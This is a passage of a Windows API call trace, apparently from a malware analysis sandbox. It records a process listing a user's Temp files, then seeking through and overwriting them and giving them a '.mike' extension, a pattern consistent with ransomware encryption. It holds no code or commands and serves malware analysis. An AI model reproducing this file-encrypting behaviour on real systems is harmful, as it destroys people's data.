lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb2081320, ftCreationTime.dwHighDateTime=0x1d4d584, ftLastAccessTime.dwLowDateTime=0x5d1f05b0, ftLastAccessTime.dwHighDateTime=0x1d4d4aa, ftLastWriteTime.dwLowDateTime=0x5d1f05b0, ftLastWriteTime.dwHighDateTime=0x1d4d4aa, nFileSizeHigh=0x0, nFileSizeLow=0x10b38, dwReserved0=0x0, dwReserved1=0x0, cFileName="O xM8JO.odp", cAlternateFileName="OXM8JO~1.ODP")) returned 1 [0145.498] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x87fec040, ftCreationTime.dwHighDateTime=0x1d4c852, ftLastAccessTime.dwLowDateTime=0x864e8e60, ftLastAccessTime.dwHighDateTime=0x1d4cc67, ftLastWriteTime.dwLowDateTime=0x864e8e60, ftLastWriteTime.dwHighDateTime=0x1d4cc67, nFileSizeHigh=0x0, nFileSizeLow=0x4d91, dwReserved0=0x0, dwReserved1=0x0, cFileName="op7stxQJ0.jpg", cAlternateFileName="OP7STX~1.JPG")) returned 1 [0145.499] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x55c40ad0, ftCreationTime.dwHighDateTime=0x1d4d578, ftLastAccessTime.dwLowDateTime=0x24267190, ftLastAccessTime.dwHighDateTime=0x1d4caa9, ftLastWriteTime.dwLowDateTime=0x24267190, ftLastWriteTime.dwHighDateTime=0x1d4caa9, nFileSizeHigh=0x0, nFileSizeLow=0xc68f, dwReserved0=0x0, dwReserved1=0x0, cFileName="P-ori- rChlL7Nv.avi", cAlternateFileName="P-ORI-~1.AVI")) returned 1 [0145.499] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb14a2010, ftCreationTime.dwHighDateTime=0x1d4d370, ftLastAccessTime.dwLowDateTime=0x6b07d760, ftLastAccessTime.dwHighDateTime=0x1d4cd2f, ftLastWriteTime.dwLowDateTime=0x6b07d760, ftLastWriteTime.dwHighDateTime=0x1d4cd2f, nFileSizeHigh=0x0, nFileSizeLow=0x951c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pl66.mkv", cAlternateFileName="")) returned 1 [0145.499] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x98564dc0, ftCreationTime.dwHighDateTime=0x1d4cfda, ftLastAccessTime.dwLowDateTime=0xe1e6e540, ftLastAccessTime.dwHighDateTime=0x1d4c971, ftLastWriteTime.dwLowDateTime=0xe1e6e540, ftLastWriteTime.dwHighDateTime=0x1d4c971, nFileSizeHigh=0x0, nFileSizeLow=0xeb5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="RNWCEa_Rm_b.gif", cAlternateFileName="RNWCEA~1.GIF")) returned 1 [0145.500] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfa850260, ftCreationTime.dwHighDateTime=0x1d4d229, ftLastAccessTime.dwLowDateTime=0x1149a3b0, ftLastAccessTime.dwHighDateTime=0x1d4c84e, ftLastWriteTime.dwLowDateTime=0x1149a3b0, ftLastWriteTime.dwHighDateTime=0x1d4c84e, nFileSizeHigh=0x0, nFileSizeLow=0xfeff, dwReserved0=0x0, dwReserved1=0x0, cFileName="rpHRY1G5j_Sal_qK.mkv", cAlternateFileName="RPHRY1~1.MKV")) returned 1 [0145.500] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa5238480, ftCreationTime.dwHighDateTime=0x1d4d0ea, ftLastAccessTime.dwLowDateTime=0xfc1e30c0, ftLastAccessTime.dwHighDateTime=0x1d4cc1a, ftLastWriteTime.dwLowDateTime=0xfc1e30c0, ftLastWriteTime.dwHighDateTime=0x1d4cc1a, nFileSizeHigh=0x0, nFileSizeLow=0x71fa, dwReserved0=0x0, dwReserved1=0x0, cFileName="rRTdcSTxrS9Cpq.flv", cAlternateFileName="RRTDCS~1.FLV")) returned 1 [0145.500] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdb1fd720, ftCreationTime.dwHighDateTime=0x1d4c9a9, ftLastAccessTime.dwLowDateTime=0xfe1df410, ftLastAccessTime.dwHighDateTime=0x1d4d4fc, ftLastWriteTime.dwLowDateTime=0xfe1df410, ftLastWriteTime.dwHighDateTime=0x1d4d4fc, nFileSizeHigh=0x0, nFileSizeLow=0x189f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="T4pA14oYz.xls", cAlternateFileName="T4PA14~1.XLS")) returned 1 [0145.501] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd978bc80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd978bc80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd978bc80, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0145.501] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x40226f10, ftCreationTime.dwHighDateTime=0x1d4cbb3, ftLastAccessTime.dwLowDateTime=0xcc9fd100, ftLastAccessTime.dwHighDateTime=0x1d4cfd0, ftLastWriteTime.dwLowDateTime=0xcc9fd100, ftLastWriteTime.dwHighDateTime=0x1d4cfd0, nFileSizeHigh=0x0, nFileSizeLow=0x18368, dwReserved0=0x0, dwReserved1=0x0, cFileName="tGVrLRIfo.m4a", cAlternateFileName="TGVRLR~1.M4A")) returned 1 [0145.501] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6c58ca20, ftCreationTime.dwHighDateTime=0x1d4c889, ftLastAccessTime.dwLowDateTime=0xd3622740, ftLastAccessTime.dwHighDateTime=0x1d4c9d1, ftLastWriteTime.dwLowDateTime=0xd3622740, ftLastWriteTime.dwHighDateTime=0x1d4c9d1, nFileSizeHigh=0x0, nFileSizeLow=0x17a4f, dwReserved0=0x0, dwReserved1=0x0, cFileName="THzMIQT0Q-S9l18rwl.pps", cAlternateFileName="THZMIQ~1.PPS")) returned 1 [0145.502] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1b0a9ec0, ftCreationTime.dwHighDateTime=0x1d4cb75, ftLastAccessTime.dwLowDateTime=0x2b786b20, ftLastAccessTime.dwHighDateTime=0x1d4d3f4, ftLastWriteTime.dwLowDateTime=0x2b786b20, ftLastWriteTime.dwHighDateTime=0x1d4d3f4, nFileSizeHigh=0x0, nFileSizeLow=0xcb69, dwReserved0=0x0, dwReserved1=0x0, cFileName="TJio.flv", cAlternateFileName="")) returned 1 [0145.502] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe704de50, ftCreationTime.dwHighDateTime=0x1d4c5b7, ftLastAccessTime.dwLowDateTime=0x8c38a5c0, ftLastAccessTime.dwHighDateTime=0x1d4ca89, ftLastWriteTime.dwLowDateTime=0x8c38a5c0, ftLastWriteTime.dwHighDateTime=0x1d4ca89, nFileSizeHigh=0x0, nFileSizeLow=0xb25f, dwReserved0=0x0, dwReserved1=0x0, cFileName="UmotUfgG9RWo_.flv", cAlternateFileName="UMOTUF~1.FLV")) returned 1 [0145.502] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc3d09e00, ftCreationTime.dwHighDateTime=0x1d4d251, ftLastAccessTime.dwLowDateTime=0x7e0a9620, ftLastAccessTime.dwHighDateTime=0x1d4d132, ftLastWriteTime.dwLowDateTime=0x7e0a9620, ftLastWriteTime.dwHighDateTime=0x1d4d132, nFileSizeHigh=0x0, nFileSizeLow=0xea30, dwReserved0=0x0, dwReserved1=0x0, cFileName="WFlPoVHCvo.mp4", cAlternateFileName="WFLPOV~1.MP4")) returned 1 [0145.502] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x874c95a0, ftCreationTime.dwHighDateTime=0x1d4d5ae, ftLastAccessTime.dwLowDateTime=0x874c95a0, ftLastAccessTime.dwHighDateTime=0x1d4d5ae, ftLastWriteTime.dwLowDateTime=0x874c95a0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WPDNSE", cAlternateFileName="")) returned 1 [0145.503] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x710142a0, ftCreationTime.dwHighDateTime=0x1d4c55f, ftLastAccessTime.dwLowDateTime=0x8b72abb0, ftLastAccessTime.dwHighDateTime=0x1d4d031, ftLastWriteTime.dwLowDateTime=0x8b72abb0, ftLastWriteTime.dwHighDateTime=0x1d4d031, nFileSizeHigh=0x0, nFileSizeLow=0x21f1, dwReserved0=0x0, dwReserved1=0x0, cFileName="YJKC0SX0lp.pps", cAlternateFileName="YJKC0S~1.PPS")) returned 1 [0145.503] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x254a3090, ftCreationTime.dwHighDateTime=0x1d4c705, ftLastAccessTime.dwLowDateTime=0xc7ad09e0, ftLastAccessTime.dwHighDateTime=0x1d4d2ca, ftLastWriteTime.dwLowDateTime=0xc7ad09e0, ftLastWriteTime.dwHighDateTime=0x1d4d2ca, nFileSizeHigh=0x0, nFileSizeLow=0xed84, dwReserved0=0x0, dwReserved1=0x0, cFileName="zM n17WWd-87B.wav", cAlternateFileName="ZMN17W~1.WAV")) returned 1 [0145.504] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2a9477c0, ftCreationTime.dwHighDateTime=0x1d4cee6, ftLastAccessTime.dwLowDateTime=0x93e53120, ftLastAccessTime.dwHighDateTime=0x1d4ce9f, ftLastWriteTime.dwLowDateTime=0x93e53120, ftLastWriteTime.dwHighDateTime=0x1d4ce9f, nFileSizeHigh=0x0, nFileSizeLow=0x9e02, dwReserved0=0x0, dwReserved1=0x0, cFileName="zrbcFCpDu3i.jpg", cAlternateFileName="ZRBCFC~1.JPG")) returned 1 [0145.504] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb4af9ce0, ftCreationTime.dwHighDateTime=0x1d4cd07, ftLastAccessTime.dwLowDateTime=0xa9cd3720, ftLastAccessTime.dwHighDateTime=0x1d4cd60, ftLastWriteTime.dwLowDateTime=0xa9cd3720, ftLastWriteTime.dwHighDateTime=0x1d4cd60, nFileSizeHigh=0x0, nFileSizeLow=0x3dd1, dwReserved0=0x0, dwReserved1=0x0, cFileName="zTmQgeO.avi", cAlternateFileName="")) returned 1 [0145.504] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0145.505] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0145.505] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0145.505] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0145.505] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0145.506] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d0) returned 1 [0145.506] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0145.506] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0145.506] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0145.507] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0145.507] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0145.507] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0145.507] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0145.508] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0145.508] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0145.508] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0145.509] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0145.509] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0145.510] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0145.510] WriteFile (in: hFile=0x280, lpBuffer=0x214eaa0*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x214eaa0*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0145.511] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0145.512] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0145.512] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0145.512] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0145.512] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0145.514] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0R9qLU2Wpa.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0R9qLU2Wpa.wav.mike", lpFilePart=0x0) returned 0x44 [0145.514] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0145.514] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0145.515] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0145.515] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0145.515] SetFilePointer (in: hFile=0x280, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2800 [0145.516] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0R9qLU2Wpa.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0R9qLU2Wpa.wav.mike", lpFilePart=0x0) returned 0x44 [0145.517] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0145.517] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0145.517] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0145.518] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0145.518] SetFilePointer (in: hFile=0x280, lDistanceToMove=20480, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x5000 [0145.519] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0R9qLU2Wpa.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0R9qLU2Wpa.wav.mike", lpFilePart=0x0) returned 0x44 [0145.519] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0145.519] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0145.520] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0145.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0145.520] SetFilePointer (in: hFile=0x280, lDistanceToMove=30720, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x7800 [0145.521] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0R9qLU2Wpa.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0R9qLU2Wpa.wav.mike", lpFilePart=0x0) returned 0x44 [0145.522] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0145.522] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0145.522] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0145.523] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0145.523] SetFilePointer (in: hFile=0x280, lDistanceToMove=40960, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xa000 [0145.524] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0R9qLU2Wpa.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0R9qLU2Wpa.wav.mike", lpFilePart=0x0) returned 0x44 [0145.524] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0145.524] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0145.525] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0145.525] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0145.525] SetFilePointer (in: hFile=0x280, lDistanceToMove=51200, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xc800 [0145.526] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0R9qLU2Wpa.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0R9qLU2Wpa.wav.mike", lpFilePart=0x0) returned 0x44 [0145.526] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0145.527] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0145.527] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0145.527] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0145.528] SetFilePointer (in: hFile=0x280, lDistanceToMove=61440, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xf000 [0145.529] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0R9qLU2Wpa.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0R9qLU2Wpa.wav.mike", lpFilePart=0x0) returned 0x44 [0145.529] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0145.529] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0145.530] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0145.530] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0145.530] SetFilePointer (in: hFile=0x280, lDistanceToMove=71680, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x11800 [0145.531] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0R9qLU2Wpa.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0R9qLU2Wpa.wav.mike", lpFilePart=0x0) returned 0x44 [0145.531] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0145.532] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0145.532] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0145.532] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0145.533] SetFilePointer (in: hFile=0x280, lDistanceToMove=81920, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x14000 [0145.534] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0R9qLU2Wpa.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0R9qLU2Wpa.wav.mike", lpFilePart=0x0) returned 0x44 [0145.534] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0145.534] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0145.535] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0145.535] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0145.535] SetFilePointer (in: hFile=0x280, lDistanceToMove=92160, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x16800 [0145.536] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0R9qLU2Wpa.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0R9qLU2Wpa.wav.mike", lpFilePart=0x0) returned 0x44 [0145.536] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0145.537] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0145.537] WriteFile (in: hFile=0x280, lpBuffer=0x21cab98*, nNumberOfBytesToWrite=0x8b0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21cab98*, lpNumberOfBytesWritten=0x2af074*=0x8b0, lpOverlapped=0x0) returned 1 [0145.537] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0145.538] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0145.540] WriteFile (in: hFile=0x280, lpBuffer=0x21cddb8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21cddb8*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0145.540] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0145.541] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0145.541] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0145.541] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0145.541] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0R9qLU2Wpa.wav", dwFileAttributes=0x80) returned 1 [0145.544] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0145.545] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0145.545] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af020) returned 1 [0145.545] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af01c) returned 1 [0145.546] WriteFile (in: hFile=0x280, lpBuffer=0x21d10a0*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af0b8, lpOverlapped=0x0 | out: lpBuffer=0x21d10a0*, lpNumberOfBytesWritten=0x2af0b8*=0x45e, lpOverlapped=0x0) returned 1 [0145.547] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0145.547] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d0) returned 1 [0145.548] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0145.548] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0145.548] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0145.548] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0145.549] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0145.549] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0145.549] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0145.549] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0145.550] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0145.550] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0145.550] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0145.551] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5vj8K5tO.swf.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5vj8K5tO.swf.mike", lpFilePart=0x0) returned 0x42 [0145.551] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0145.552] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0145.552] WriteFile (in: 